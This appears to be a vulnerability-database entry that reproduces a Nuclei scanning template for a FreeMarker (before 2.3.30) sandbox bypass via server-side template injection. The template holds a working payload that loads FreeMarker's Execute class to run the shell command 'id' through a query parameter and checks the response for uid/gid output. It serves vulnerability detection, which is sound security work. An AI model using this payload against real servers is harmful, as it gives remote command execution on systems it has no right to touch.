漏洞描述
Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
freemarker-sandbox-bypass-ssti: Freemarker < 2.3.30 Sandbox Bypass - Server Side Template Injection
PoC代码[已公开]
id: freemarker-sandbox-bypass-ssti
info:
name: Freemarker < 2.3.30 Sandbox Bypass - Server Side Template Injection
author: ritikchaddha
severity: high
description: |
Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#freemarker---sandbox-bypass
metadata:
verified: true
tags: ssti,dast,freemarker,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- "<#assign%20classloader=article.class.protectionDomain.classLoader><#assign%20owc=classloader.loadClass(%22freemarker.template.ObjectWrapper%22)><#assign%20dwf=owc.getField(%22DEFAULT_WRAPPER%22).get(null)><#assign%20ec=classloader.loadClass(%22freemarker.template.utility.Execute%22)>${dwf.newInstance(ec,null)(%22id%22)}"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a00473045022100ac8c10f30a5cdc7e823e21020c162e3905bb3224dc545e42d0af472fe3b9cc3802204b4d959cdab058adf6963fdb8f84eeb01e420b56b927cd2f3a6b9041ec60a4cd:922c64590222798bb761d5b6d8e72950